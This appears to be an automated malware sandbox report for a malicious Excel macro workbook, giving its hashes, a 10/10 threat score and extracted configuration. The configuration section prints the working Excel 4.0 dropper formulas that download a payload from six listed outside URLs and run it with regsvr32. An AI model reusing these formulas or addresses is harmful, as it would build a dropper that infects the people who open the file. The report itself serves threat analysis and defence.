Overview

overview

10

Static

static

10

c8b3cf4b2d...5.xlsm

windows7-x64

10

c8b3cf4b2d...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c8b3cf4b2dea0ccbcf1196abe6daf1f442e76e2eef8d7b58890f4fe876832c95

  • Size

    45KB

  • Sample

    241120-w7taba1hnn

  • MD5

    aa0b44393caf0bf1d22aa2d93ce6a43a

  • SHA1

    90b56e653e23c18f003b276983fac82eaf7aa410

  • SHA256

    c8b3cf4b2dea0ccbcf1196abe6daf1f442e76e2eef8d7b58890f4fe876832c95

  • SHA512

    0f90b798548b0d4912e5a90e26070826ec9715be579dcc7392826be8be0ce7277de73ab2d7ec70f0d950cae3be924bd8711a76d4d4278b0392aac1634e050900

  • SSDEEP

    768:wBXcCsqi1O3bQkzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+U60Us:wBXcC5iybdtT5fTR4Lh1NisFYBc3cr+A

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://sorathlions.com/tmp/FlTSgo/

http://www.ajaxmatters.com/c7g8t/vkw42Xr0hItVeGsaO9D/

https://uzamart.com/indrawal/GZ7bN0V68oRpN7/

http://51.222.72.237/wp-includes/aF5qo4EV0Nr1vMGyHP/

http://centrobilinguelospinos.com/wp-admin/7Hm58jhbiYSrd1TKvtG/

http://blog.centerking.top/wp-includes/PZ823VXII8/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sorathlions.com/tmp/FlTSgo/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/vkw42Xr0hItVeGsaO9D/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://uzamart.com/indrawal/GZ7bN0V68oRpN7/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.237/wp-includes/aF5qo4EV0Nr1vMGyHP/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://centrobilinguelospinos.com/wp-admin/7Hm58jhbiYSrd1TKvtG/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/PZ823VXII8/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://sorathlions.com/tmp/FlTSgo/
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/vkw42Xr0hItVeGsaO9D/
xlm40.dropper

https://uzamart.com/indrawal/GZ7bN0V68oRpN7/
xlm40.dropper

http://51.222.72.237/wp-includes/aF5qo4EV0Nr1vMGyHP/
xlm40.dropper

http://centrobilinguelospinos.com/wp-admin/7Hm58jhbiYSrd1TKvtG/
xlm40.dropper

http://blog.centerking.top/wp-includes/PZ823VXII8/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://sorathlions.com/tmp/FlTSgo/
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/vkw42Xr0hItVeGsaO9D/

Targets

    • Target

      c8b3cf4b2dea0ccbcf1196abe6daf1f442e76e2eef8d7b58890f4fe876832c95

    • Size

      45KB

    • MD5

      aa0b44393caf0bf1d22aa2d93ce6a43a

    • SHA1

      90b56e653e23c18f003b276983fac82eaf7aa410

    • SHA256

      c8b3cf4b2dea0ccbcf1196abe6daf1f442e76e2eef8d7b58890f4fe876832c95

    • SHA512

      0f90b798548b0d4912e5a90e26070826ec9715be579dcc7392826be8be0ce7277de73ab2d7ec70f0d950cae3be924bd8711a76d4d4278b0392aac1634e050900

    • SSDEEP

      768:wBXcCsqi1O3bQkzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+U60Us:wBXcC5iybdtT5fTR4Lh1NisFYBc3cr+A

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks